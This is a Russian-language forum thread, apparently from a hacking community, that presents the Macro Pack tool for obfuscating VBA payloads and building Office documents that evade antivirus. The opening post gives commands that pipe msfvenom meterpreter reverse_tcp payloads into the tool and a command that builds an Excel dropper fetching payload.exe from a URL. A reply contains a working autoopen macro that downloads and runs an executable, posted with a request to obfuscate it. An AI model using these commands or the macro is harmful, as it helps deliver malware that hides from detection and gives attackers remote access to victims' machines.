Soft MacroPack - Обфускация shellcode

Vander

Vander

CodebyTeam
Gold Team
16.01.2016
1 454
4 327
Приветствую, сегодня хочу представить аудитории инструмент, целью которого является обфускация вашего, или где-то позаимствованного кода. Итогом будет, как обещают авторы, снижение агрессии на него АВ-программ. Я полагаю, не нужно обьяснять, что обфусцированные примеры не стоит постить на любимый многими «хакерами» ресурс.

Вот собственно, Macro Pack:

upload_2017-10-11_22-6-21.png


Macro Pack - это инструмент, используемый для автоматизации обфускации и генерации документов MS Office для проведения тестирования на проникновение. Macro Pack – позволяет обойти алгоритмы выявления вредоносного кода антивирусными программами и упростит преобразование vba – полезной нагрузки в окончательный документ Office.

Более подробная информация находится тут:

>

Особенности:

  • Отсутствует необходимость конфигурирования
  • Необходимые действия могут быть выполнены одной строкой кода
  • Создание Word, Excel и PowerPoint документов
Инструмент совместим с полезными нагрузками, создаваемыми популярными пентест инструментами (Metasploit, Empire, ...). Также легко сочетается с другими утилитами. Этот инструмент написан на Python3 и работает как на платформе Linux, так и на платформе Windows.

Примечание:
Для Windows необходим подлинный пакет MS Office для автоматической генерации документов Office или троянских функций
Обфускация:
  • Переименование функций
  • Переименование переменных
  • Удаление пробелов
  • Удаление комментариев
  • Кодирующие строки
Обратите внимание, что основная цель обфускации Macro Pack заключается не в противодействии обратной инженерии, а в предотвращении обнаружения антивируса.

Установка:
Код:
git clone https://github.com/sevagas/macro_pack
cd macro_pack
upload_2017-10-11_22-6-55.png

Код:
pip3 install -r requirements.txt
upload_2017-10-11_22-7-12.png


Примечание. Для Windows вам необходимо загрузить вручную pywin32

>

Справка:
Код:
macro_pack.py  --help
upload_2017-10-11_22-7-52.png


Использование:

Обфускация полезной нагрузки в формате vba, сгенерированной msfvenom, и помещение результата в новый файл vba.
Код:
msfvenom -p windows / meterpreter / reverse_tcp LHOST = 192.168.0.5 -f vba | macro_pack.py -o -v meterobf.vba
Обфускация Empire stager vba файла и создание документа MS Word:
Код:
macro_pack.py -f empire.vba -o -W myDoc.docm
Создание файла MS Excel, содержащего обфускационную капельницу (загрузите файл loadload.exe и храните его как drop.exe)
Код:
echo "https: //myurl.url/payload.exe" "drop.exe" | macro_pack.py -o -t DROPPER -x "drop.xlsm"
Создание документа Word 97, содержащего обфускацию полезной нагрузки обратного подключения VBA в общей папке:
Код:
msfvenom.bat -p windows / meterpreter / reverse_tcp LHOST = 192.168.0.5 -f vba | macro_pack.exe -o -w \\ REMOTE-PC \ Share \ meter.doc
Рассмотрим это на небольшом примере:

Обфусцируем VBA от Metasploit:
Код:
msfvenom -p windows / meterpreter / reverse_tcp LHOST = 192.168.0.5 -f vba –o 123.txt
upload_2017-10-11_22-8-53.png

Код:
msfvenom -p windows / meterpreter / reverse_tcp LHOST = 192.168.0.5 -f vba | macro_pack.py -o -v 1234.vba
upload_2017-10-11_22-9-10.png


Результат будет таким:

upload_2017-10-11_22-9-48.png


Полагаю, инструмент окажется полезным и займет место в наборе начинающего/опытного пентестера.

Спасибо за внимание
 
akv8

akv8

Member
29.06.2017
19
16
Тестил данный инструмент, и с obfuscate как то грустно сейчас, документ c макросом msfvenom и meterpreter сразу чекается AV.
На nodistributecom, детектов полно. Pro версию никто не доставал?
 
jonni80

jonni80

Active member
24.06.2017
39
6
Ребят в исходниках недавние обновления. Тестил кто сейчас на AV тулзу. И проблемка у меня с pip3 , в kali 2018.3 пишет что команда не найдена. install не выручает, python 3.6.6 стоит.
Вообщем не настраивается инструмент. выручайте
 
Doctor zlo

Doctor zlo

Well-known member
18.05.2017
74
34
Ребят в исходниках недавние обновления. Тестил кто сейчас на AV тулзу. И проблемка у меня с pip3 , в kali 2018.3 пишет что команда не найдена. install не выручает, python 3.6.6 стоит.
Вообщем не настраивается инструмент. выручайте
Сегодня поставил все отлично работает. Попробуйте установить pip3 такой командой: sudo apt install python3-pip потом установите зависимости и перейдите в src там будет macro_pack.py
 
A

acuntenix

Member
30.01.2019
5
0
У меня макрос есть готовый на скачку и выполнение *.exe
Как мне зашифровать его ?

Код:
Private Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long

Sub autoopen()
Dim ret As Long
        Dim HTTPfile As String, LocalFile As String

        HTTPfile = "https://mirror.putty.org.ru/0.71/w64/putty.exe"
        LocalFile = "C:\Users\Public\putty.exe"

        ret = URLDownloadToFile(0, HTTPfile, LocalFile, 0, 0)
        Dim CurDirBackup As String
        Shell "C:\Users\Public\putty.exe", vbNormalFocus
        
        End Sub
 
lomini

lomini

Well-known member
10.12.2019
45
5
У меня макрос есть готовый на скачку и выполнение *.exe
Как мне зашифровать его ?

Код:
Private Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long

Sub autoopen()
Dim ret As Long
        Dim HTTPfile As String, LocalFile As String

        HTTPfile = "https://mirror.putty.org.ru/0.71/w64/putty.exe"
        LocalFile = "C:\Users\Public\putty.exe"

        ret = URLDownloadToFile(0, HTTPfile, LocalFile, 0, 0)
        Dim CurDirBackup As String
        Shell "C:\Users\Public\putty.exe", vbNormalFocus
      
        End Sub
Что ты добьешься тем что у тебя выполнится патти ? :)
сессию надо прокидывать метера
 
Ondrik8

Ondrik8

prodigy
08.11.2016
1 034
3 017
я чето шеллкода тут не увидел)

если сравнить с этим
c-shellcode.png

а так хотелось узнать, как его действительно можно обфусцировать)
 
Ondrik8

Ondrik8

prodigy
08.11.2016
1 034
3 017
вот тут если что SHELLCODE за - Encod-ить можно)
раз уж тема про него)
 
Мы в соцсетях: